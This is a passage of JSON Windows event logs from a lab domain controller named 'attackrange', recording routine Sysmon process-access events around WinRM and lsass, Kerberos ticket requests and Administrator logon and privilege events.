05:47:10.187","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01DE-5F25-0000-0010C46B0400}","TargetProcessId":"4332","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2494,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:10.203\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nSourceProcessId: 1332\r\nSourceThreadId: 2264\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01DE-5F25-0000-0010C46B0400}\r\nTargetProcessId: 4332\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x40\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\winrscmd.dll+8d36|C:\\Windows\\system32\\winrscmd.dll+92d5|C:\\Windows\\system32\\winrscmd.dll+af31|C:\\Windows\\system32\\winrscmd.dll+23dc|c:\\windows\\system32\\wsmsvc.dll+155ac7|c:\\windows\\system32\\wsmsvc.dll+13f76d|c:\\windows\\system32\\wsmsvc.dll+13f3cf|c:\\windows\\system32\\wsmsvc.dll+13fcb2|c:\\windows\\system32\\wsmsvc.dll+9ab10|c:\\windows\\system32\\wsmsvc.dll+9b611|c:\\windows\\system32\\wsmsvc.dll+4495|c:\\windows\\system32\\wsmsvc.dll+16816c|c:\\windows\\system32\\wsmsvc.dll+1689b8|c:\\windows\\system32\\wsmsvc.dll+16345b|c:\\windows\\system32\\wsmsvc.dll+163125|c:\\windows\\system32\\wsmsvc.dll+14ce9c|c:\\windows\\system32\\wsmsvc.dll+130049|c:\\windows\\system32\\wsmsvc.dll+13571a|c:\\windows\\system32\\wsmsvc.dll+12f47e|c:\\windows\\system32\\wsmsvc.dll+125587|c:\\windows\\system32\\wsmsvc.dll+11f562|c:\\windows\\system32\\wsmsvc.dll+124574","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:10.203","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","SourceProcessId":"1332","SourceThreadId":"2264","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01DE-5F25-0000-0010C46B0400}","TargetProcessId":"4332","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x40","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\winrscmd.dll+8d36|C:\\Windows\\system32\\winrscmd.dll+92d5|C:\\Windows\\system32\\winrscmd.dll+af31|C:\\Windows\\system32\\winrscmd.dll+23dc|c:\\windows\\system32\\wsmsvc.dll+155ac7|c:\\windows\\system32\\wsmsvc.dll+13f76d|c:\\windows\\system32\\wsmsvc.dll+13f3cf|c:\\windows\\system32\\wsmsvc.dll+13fcb2|c:\\windows\\system32\\wsmsvc.dll+9ab10|c:\\windows\\system32\\wsmsvc.dll+9b611|c:\\windows\\system32\\wsmsvc.dll+4495|c:\\windows\\system32\\wsmsvc.dll+16816c|c:\\windows\\system32\\wsmsvc.dll+1689b8|c:\\windows\\system32\\wsmsvc.dll+16345b|c:\\windows\\system32\\wsmsvc.dll+163125|c:\\windows\\system32\\wsmsvc.dll+14ce9c|c:\\windows\\system32\\wsmsvc.dll+130049|c:\\windows\\system32\\wsmsvc.dll+13571a|c:\\windows\\system32\\wsmsvc.dll+12f47e|c:\\windows\\system32\\wsmsvc.dll+125587|c:\\windows\\system32\\wsmsvc.dll+11f562|c:\\windows\\system32\\wsmsvc.dll+124574","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2495,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:10.218\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 992\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:10.218","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"992","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220350,"ProcessID":864,"ThreadID":992,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-1117747729-287425051-3091891954-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220351,"ProcessID":864,"ThreadID":992,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{D65C3B12-F0AD-F3F8-A7DB-D3AB603729DE}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-881393$\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-881393$","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{D65C3B12-F0AD-F3F8-A7DB-D3AB603729DE}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220352,"ProcessID":864,"ThreadID":992,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{D65C3B12-F0AD-F3F8-A7DB-D3AB603729DE}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{D65C3B12-F0AD-F3F8-A7DB-D3AB603729DE}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220353,"ProcessID":864,"ThreadID":992,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x478FE\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{D65C3B12-F0AD-F3F8-A7DB-D3AB603729DE}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-881393\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x478fe","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-881393","LogonGuid":"{D65C3B12-F0AD-F3F8-A7DB-D3AB603729DE}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220354,"ProcessID":864,"ThreadID":992,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x478FE\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x478fe","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2496,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:10.218\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 992\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:10.218","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"992","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2497,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:10.218\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 992\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:10.218","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"992","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
